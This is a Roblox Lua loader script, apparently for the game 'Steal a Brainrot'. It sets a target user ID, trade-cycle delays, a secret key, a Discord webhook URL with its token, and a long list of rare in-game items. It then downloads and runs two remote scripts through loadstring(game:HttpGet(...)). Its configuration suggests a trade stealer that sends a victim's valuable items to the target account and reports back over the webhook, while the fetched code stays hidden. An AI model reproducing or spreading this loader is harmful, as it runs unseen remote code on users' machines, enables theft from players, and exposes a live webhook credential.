getgenv().SECRET_KEY = "mrr_8bafa27f91574620aa29c3af4ea50072"
getgenv().TARGET_ID = 3867695277
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().DISCORD_WEBHOOK = "https://discord.com/api/webhooks/1487166008509599795/vJVEVfhevB5ig53ttlDYRSqQkPyquOTMISd4o3-IfYf6iSo5ssx7406HAOZkoFoDX1Uh"
getgenv().TARGET_BRAINROTS = {
    ["Meowl"] = true,
    ["Skibidi Toilet"] = true,
    ["Strawberry Elephant"] = true,
    ["Headless Horseman"] = true,
    ["La Lucky Grande"] = true,
    ["Griffin"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Dragon Gingerini"] = true,
    ["Dragon Cannelloni"] = true,
    ["La Supreme Combinasion"] = true,
    ["Celestial Pegasus"] = true,
    ["Cerberus"] = true,
    ["Love Love Bear"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Rosey and Teddy"] = true,
    ["Capitano Moby"] = true,
    ["Cooki and Milki"] = true,
    ["Burguro And Fryuro"] = true,
    ["Ketupat Bros"] = true,
    ["Reinito Sleighito"] = true,
    ["La Secret Combinasion"] = true,
    ["La Casa Boo"] = true,
    ["Spooky and Pumpky"] = true,
    ["Garama and Madundung"] = true,
    ["Festive 67"] = true,
    ["Ginger Gerat"] = true,
    ["Nacho Spyder"] = true,
    ["Antonio"] = true,
    ["La Food Combinasion"] = true,
    ["Fragrama and Chocrama"] = true,
    ["Signore Carapace"] = true,
    ["Elefanto Frigo"] = true,
    ["Spaghetti Tualetti"] = true,
    ["Los Spaghettis"] = true,
    ["Sammyni Fattini"] = true,
    ["Rosetti Tualetti"] = true,
    ["Tirilikalika Tirilikalako"] = true,
    ["La Romantic Grande"] = true,
    ["Tictac Sahur"] = true,
    ["La Extinct Grande"] = true,
    ["Ventoliero Pavonero"] = true,
    ["Fortunu and Cashuru"] = true,
    ["Los Amigos"] = true,
    ["Los Sekolahs"] = true,
    ["La Ginger Sekolah"] = true,
    ["Ventoliero Pavonero"] = true,
    ["Cloverat Clapat"] = true,
    ["Fishino Clownino"] = true,
    ["Gold Gold Gold"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Lavadorito Spinito"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Swaggy Bros"] = true,
    ["Orcaledon"] = true,
    ["La Taco Combinasion"] = true,
    ["Ketupat Kepat"] = true,
    ["Dug dug dug"] = true,
    ["Tang Tang Keletang"] = true,
    ["Lovin Rose"] = true,
    ["Los Tacoritas"] = true,
    ["Eviledon"] = true,
    ["Los Primos"] = true,
    ["W or L"] = true,
    ["Las Sis"] = true,
    ["Money Money Puggy"] = true,
    ["Celularcini Viciosini"] = true,
    ["Los Bros"] = true,
    ["Chillin Chili"] = true,
    ["Tuff Toucan"] = true,
    ["Gobblino Uniciclino"] = true,
    ["Tralaledon"] = true,
    ["Los Puggies"] = true,
    ["La Jolly Grande"] = true,
    ["Chipso and Queso"] = true
}
task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/fbcd1d25889a843297107dea3642044d.lua"))()
end)
task.spawn(function()
loadstring(game:HttpGet("https://api.jnkie.com/api/v1/luascripts/public/72bdd0e2a92a3d6de5c85f3672cb06c6a948f4fa24c0d2a3fc91585ee910f726/download"))()
end)
